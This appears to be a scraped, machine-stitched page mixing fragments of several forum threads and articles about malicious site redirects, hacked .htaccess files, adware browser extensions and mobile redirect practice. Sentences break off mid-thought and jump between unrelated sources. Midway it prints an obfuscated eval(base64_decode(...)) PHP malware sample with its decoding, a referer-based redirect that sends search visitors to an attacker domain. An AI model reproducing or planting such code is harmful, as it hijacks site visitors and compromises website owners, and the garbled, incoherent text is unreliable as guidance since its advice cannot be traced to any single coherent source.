maybe dh42 can verify...wake up lesley

These files are a good place to start looking for any malicious code. I guess my site likes to add /brands to urls and create 404 errors Back to top #17 generalexperts Posted 12 November 2014 - 12:30 AM generalexperts PrestaShop Enthusiast Members I removed that from my .htaccess. The file was visible only while browsing the site in IIS.

Redirects/conditional redirects using the .htaccess file are discussed in greater detail in the post How to check the .htaccess file for malware, malicious directives. Typically, this notice is accompanied by a CAPTCHA that will allow you to enter some characters to prove that you're human.

Blakester97 Posted 3/12/13, 4:24 AM Question owner I will get back post back in about 24 hours on my progress with the issue. It occurs only with separate urls. Content driven redirects These redirects are not technical requirements to display a page. Look for any programs you don't recognize.

It is likely that your server configuration has been modified." However, when the site owner navigates to the site/page (from a bookmark or by entering the URL in the browser address I asked google and they said that would not be the issue, but I did it anyway. Once the scan has completed you will be shown the results - assuming that the scanner has found anything. It gets even worse than that The above process is just for the html of your page.

I will ask dh42 if he can take a look and i will move this post to better area of forum. A site owner (or Google) might request a URL 100 times and all works fine and then on request 101 the request redirects, or the request may redirect between 8 and They're using everyone to program their image detection algorithms. The best solution is to have parity between your mobile and desktop content.

PHP executes server side so you will not see php code in output that is sent to the users browser (unless there is a pretty big error in the coding), the If a page on your site doesn't have a smartphone equivalent, keep users on the desktop page. These are redirects that webmaster have added because mobile and desktop versions of their pages may not cover the exact same things and some mobile pages are redirected to other locations

Some examples are toseeka, grooveswish and thenewcar. it would also be nice if you can report back if the redirects stop after removing this fake flash extension - then i can arrange for it to be blocklisted, so when a solution is found. Now what?

could you go to firefox > help > troubleshooting information, copy the content of the page & paste them here into a reply on the forum? In other words even if that page loads in less than a second, it would still take several seconds for a user to see that page because of the redirects. Keep in mind that this conversation has to take place before any of your webpage even begins to be displayed at all. Back to top #12 El Patron Posted 11 November 2014 - 10:47 PM El Patron PrestaShop Legend Members 14000 Active Posts I have changed it to https://www.mydomain.com.

Hackers frequently place 100s of blank lines and/or tab their malicious lines way over to the right in an attempt to hide their malicious code. eval(base64_decode ("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQlwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9")); decodes to -> if (stristr($_SERVER[http_REFERER],"bing")) { preg_match ("/q\=(.*?)&/",$_SERVER[http_REFERER],$kk); header("Location: http://proppera.co.cc/?q=".$kk[1]); exit(); } elseif (stristr($_SERVER[http_REFERER],"yahoo")) { preg_match ("/p\=(.*?)&/",$_SERVER[http_REFERER],$kk); header("Location: http://proppera.co.cc/?q=".$kk[1]); exit(); } elseif (stristr($_SERVER[http_REFERER],"google")) { if (!stristr($_SERVER[http_REFERER],".nu") and !stristr($_SERVER[http_REFERER],"site") and

While the examples are from a Wordpress site the techniques would be similar in any php based site.

On this site the hacker had successfully uploaded some base64_encoded php in a .php file. It costs a little bit of money but well worth it in my opinion and you know what I mean if you had the virus, it could drive a man mad. afterwards install the search reset addon - it will revert the most common customizations those adware programs do This process is very slow on mobile networks because each time any communication happens between the device and the webserver, many things have to happen to facilitate that communication.

Faulty Redirects If you have separate mobile URLs, you must redirect mobile users on each desktop URL to the appropriate mobile URL. Click Empty Trash. I don't know what would be triggering that. Here is the list: Add Google Search To New Tab [email protected] Contribute Toolbar6.1true{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} BrowserProtect2.6.1095.52true{0F827075-B026-42F3-885D-98981EE7B1AE} Java Console6.0.35true{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} Java Console6.0.37true{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} McAfee SiteAdvisor3.6.0true{4ED1F68A-5463-4931-9384-8FFF5ED91D92} Adobe Acrobat - Create [email protected] If nothing is wrong with that,

Mobile device: "Give me http://example.com" Web server: "http://example.com has been moved to "http://www.example.com" Mobile device: "Okay, give me "http://www.example.com" Web server: "http://www.example.com has been moved to "https://www.example.com" Mobile device: "Okay, give Instead of using a proprietary video player or putting content in unsupported formats, we recommend using HTML5 standard tags to include videos or animations. Hi, When opening a new tab Firefox redirects to an untrusted site, wich doesn't happen if I open a new window.

These hacks are typically done with some obfuscated php code as described earlier. Back to top #13 haggggler haggggler Topic Starter Members 10 posts OFFLINE Local time:11:40 AM Posted 13 February 2011 - 05:23 PM I thought about that but didn't fully understand Google Web Designer makes it easy to create these animations in HTML5. Another common way hackers accomplish redirects/conditional redirects is through the use of malicious php code.

Access was denied to the hosts file for delete, rename or overwrite, so: I rebooted to safe mode and saved a copy of the hosts file to the desktop. Register a free account to unlock additional features at BleepingComputer.com Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Have been using it for several months before the problem occurred. Removing the SSL - secure pages redirect The reason a redirect exists for SSL sites is normally because the webmaster used an "easy fix" of doing a site wide 301 redirect

Thank you. Removing the initial / canonical redirect This type of redirect was typically implemented for SEO (search engine optimization) purposes. By using our services, you agree to use our cookies. Read more.

When you update the extension, they can install malware onto your computer. philipp Top 10 Contributor Moderator 4359 solutions 19550 answers Posted 3/12/13, 4:09 AM your bookmarks & passwords will be kept but most of the other settings will be reverted to their They still say that is not an issue... In this hack a request is first redirected to mollsong.ru/sher?3 and from there the requested is redirected again either to http://www.google.com/Sorry and you get a 404 file not found message, or

You can use the Blogger Tool to isolate the gadget.